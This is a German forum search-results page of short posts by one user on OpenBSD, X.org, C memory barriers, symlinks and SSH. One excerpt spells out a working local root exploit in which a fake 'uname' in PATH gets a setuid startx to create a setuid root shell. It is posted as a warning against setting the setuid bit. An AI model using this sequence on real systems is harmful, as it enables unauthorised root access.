• Diese Seite verwendet Cookies. Indem du diese Website weiterhin nutzt, erklärst du dich mit der Verwendung von Cookies einverstanden. Erfahre mehr

Suchergebnisse

  1. Paldium

    openssl und Alternative Names

    Die alternativen Namen sind eine Erweiterung, die du explizit als Zertifizierer annehmen musst. Ich habe mir das recht einfach gemacht, indem ich die Konfiguration für die CSR-Generierung auch für die Signierung genutzt habe. Das macht es für mich als eigene CA deutlich einfacher, weil ich dann...
  2. Paldium

    OpenBSD 6.4-current: Xorg nur als root

    /usr/X11R6/bin/startx habt ihr setuid gegeben? Only one local root exploit since today! # chmod +s /usr/X11R6/bin/startx $ mkdir ~/exploit $ cd ~/exploit $ echo "/bin/cp /bin/sh /bin/root-sh; /bin/chmod +s /bin/root-sh" > uname $ chmod 755 uname $ PATH=. /usr/X11R6/bin/startx Und schon habt...
  3. Paldium

    OpenBSD 6.4-current: Xorg nur als root

    Das hat mit der zuletzt behobenen Sicherheitslücke in X.org zu tun: OpenBSD 6.4 Errata 001 Wenn du Xorg einsetzen willst, dann wird xenodm empfohlen. Wenn du den definitiv nicht einsetzen willst, kannst du auch wieder das setuid-Bit setzen, wovon angesichts der generellen Sicherheitsbedenken...
  4. Paldium

    Inside C Memory

    Also wenn du unter Linux Statistiken eines Allokators haben möchtest, kannst du ansehen, was der Kernel intern verwaltet: $ cat /proc/buddyinfo Node 0, zone DMA 1 0 1 0 2 1 1 0 1 1 3 Node 0, zone DMA32 8 10 11 9...
  5. Paldium

    Usernames

    Mit CVS konnte man damals auch noch einen lustigen Effekt hinbekommen. Der Benutzername durfte dafür nur aus Ziffern und Punkten bestehen, wie zum Beispiel "1337" oder "1.5". Wenn ein solcher Benutzer per CVS etwas eingecheckt hat, konnte die resultierende RCS-Datei nicht mehr geparst werden...
  6. Paldium

    OpenSSH: client bug CVE-2016-0777

    Begrenzt sich nicht nur auf OpenBSD, daher als Info an alle: http://undeadly.org/cgi?action=article&sid=20160114142733 Kurz um: # echo 'UseRoaming no' >> /etc/ssh/ssh_config
  7. Paldium

    OpenBSD auf Thinkpad T61

    Es wird standardmäßig ACPI verwendet. Benutze hier ein 5.7-System mit GENERIC-Kernel: $ dmesg | grep ^acpi0 acpi0 at bios0: rev 0 acpi0: sleep states S0 S1 S3 S4 S5 ... Was die Namensgebung apmd angeht, so verweise ich nur auf ftp, mit dem man per HTTPS Dateien runterladen kann... ;) Wem...
  8. Paldium

    ASROCK N3150DC - Bootet unter 5.7 aber nicht mit Current

    Da es sich eindeutig um einen Softwarefehler handelt, empfehle ich http://www.openbsd.org/report.html zu lesen, um dann einen Bugreport an bugs@openbsd.org zu senden. Leider handelt es sich um ein Problem, das nur mit spezieller Hardware zu reproduzieren ist. Wenn du schnelle Hilfe benötigst...
  9. Paldium

    Host AP mit OpenBSD 5.7 funktioniert nicht

    05:00.0 Network controller: Qualcomm Atheros AR928X Wireless Network Adapter (PCI-Express) (rev 01) 05:00.0 0280: 168c:002a (rev 01) Bei mir funktioniert WLAN soweit. Ich habe hier im Thread noch nicht wieder geantwortet, da ich mit den PF-Queues noch nicht viel Erfahrung gesammelt habe (meine...
  10. Paldium

    Host AP mit OpenBSD 5.7 funktioniert nicht

    Hallo, habe ebenfalls ein APU-Board im Einsatz mit OpenBSD 5.7-stable inklusive athn-Treiber (Atheros AR9281). Ich nehme jetzt einfach mal an, dass kein Hardwareproblem vorliegt. Hast du diesbezüglich mal ein anderes OS ausprobiert? Bei meiner Karte musste ich in der /etc/hostname.athn0 ein...
  11. Paldium

    Programmierbuddies C++/Boost/C++11

    Bei der Prüfung auf Dateien mit gleichem Inhalt kannst du Zeit sparen, wenn du auch die Existenz von Hardlinks berücksichtigst. In dem Fall ist der Inhalt nicht nur der gleiche, sondern der selbe. Du hattest noch nicht geschrieben, wofür du das Programm brauchst. Wenn es um Deduplizierung...
  12. Paldium

    C, Speicherbarrieren und Signale

    Ich verweise nochmal auf Post #6. Woher weiß ich, welche Aufrufe der Compiler in ihrer Reihenfolge austauschen darf? Und ich wiederhole nochmal: Mir geht es beim Compiler natürlich nicht um den Signalhandleraufruf. Woher weiß ich, dass die Reihenfolge der Instruktionen wirklich eingehalten...
  13. Paldium

    Offtopic Posts aus dem Thread: aktuelles - deutsches - FreeBSD Buch

    Vergiss nicht, dass du hier mit Generation Smartphone diskutierst. Dich wird man schon dumm ansehen, weil du von einer DIN-A4-Seite sprichst (Wie jetzt, ausdrucken? Papier ist scheiße man!). Also sprich lieber von einem Bildschirminhalt. Na ja, auch schon wieder so ein langes Wort. Und die...
  14. Paldium

    C, Speicherbarrieren und Signale

    Stimmt, ich leite aus seinem Commit lediglich ab, dass der Code nicht zerwürfelt wird. Einfach aus der Tatsache, dass er eine Racecondition erkannt und mit einfachem sigprocmask behoben hat. Es ist jetzt natürlich eine Unterstellung meinerseits, dass Theo weiß, was er da tut. Mit dem...
  15. Paldium

    C, Speicherbarrieren und Signale

    http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/sort/file.c.diff?r1=1.13&r2=1.14&f=h Da war Theo schneller. ;) Danke trotzdem. Für... Na ja, irgendwas.
  16. Paldium

    C, Speicherbarrieren und Signale

    Meine Fragen zielten doch genau darauf ab: Darf der Austausch eines Pointers unter *BSD als atomar angesehen werden? Ich vermute: Nein. Kann der Compiler die von mir geposteten Instruktionen in ihrere Reihenfolge austauschen? Ich vermute: Ja. Die Reihenfolge beziehe ich natürlich nicht auf die...
  17. Paldium

    C, Speicherbarrieren und Signale

    Okay, Speicherbarriere ist definitiv hardwarenäher als gedacht und eine schlechte Wortwahl meinerseits. An welchen Stellen hört der Compiler auf, Code durcheinanderzuwürfeln? Ab wann weiß ich, dass bestimmte Funktionen in bestimmten Reihenfolgen garantiert ausgeführt werden? Als Faustregeln...
  18. Paldium

    C, Speicherbarrieren und Signale

    Wenn ich Speicherbarrieren richtig verstanden habe, dann stellen sie sicher, dass der Compiler Code nur zwischen zwei Barrieren beliebig austauschen darf. Zwei Barrieren wären "volatile" Variablen und Funktionsaufrufe. Mein Beispielcode wäre dieser hier: struct cleanable *c; c =...
  19. Paldium

    Problem mit symlink des Homeverzeichnisses

    Ach herrje, und ich hatte PWD absichtlich falsch gesetzt um das zu testen... Ich gebs auf. pwd und /bin/pwd geben beide das Richtige zurück. pcmanfm sollte also PWD und getcwd() prüfen, so wie /bin/pwd das macht. Was ich ja eigentlich sagen wollte: Ist nicht (unbedingt) Schuld der Shell...
  20. Paldium

    Problem mit symlink des Homeverzeichnisses

    Oh, das war jetzt mein Versehen. Meine Aussage ist nicht 100%ig richtig. Meine Testumgebung hatte einen Link von /home/jochen auf /usr/home/jochen. Wenn aber /home selbst ein Link ist und jochen wiederum ein Verzeichnis, dann kann /bin/pwd -L es vernünftig auflösen... Meine restlichen...
  21. Paldium

    Problem mit symlink des Homeverzeichnisses

    Einige Shells halten sich an POSIX, andere nicht. .. und alles ist eine Datei. So wie die Netzwerkinterfaces. *hust* Stark vereinfacht könnte man sowas stehen lassen, aber es stimmt einfach nicht. Hardlinks könnte man noch akzeptieren, aber symbolische Links sind weder für den Programmierer...
  22. Paldium

    Problem mit symlink des Homeverzeichnisses

    Also das würde ich jetzt als Bug in der bash einstufen. Wenn man in /usr/home/pit also bash aufruft, landet man in /home/pit? :ugly: Das Verhalten hat die bash ja nicht, wenn man sie in /usr aufruft, wie zuvor von dir gezeigt.
  23. Paldium

    Problem mit symlink des Homeverzeichnisses

    Richtig oder nicht richtig liegt im Auge des Betrachters. Technisch passender sind die Ausdrücke "L"ogisch und "P"hysisch. Ein logischer Pfad enthält symbolische Links, ein physischer Pfad nicht. Welcher jetzt angezeigt und ausgewertet wird, ist abhängig von der Shell. POSIX-konforme Shells...
  24. Paldium

    linux/ssh/bash frage: warum ist CTRL+C so langsam?

    Beende den Prozess mal mit SIGINT, was standardmäßig das Signal ist, das du mit STRG+C an den Prozess sendest: $ kill -2 pid
  25. Paldium

    Algorithmus für Festplattenverschlüsselung

    Keine Sorge, Puffy ist noch immer standardmäßig für deine Passwörter in der /etc/master.passwd zuständig. ;)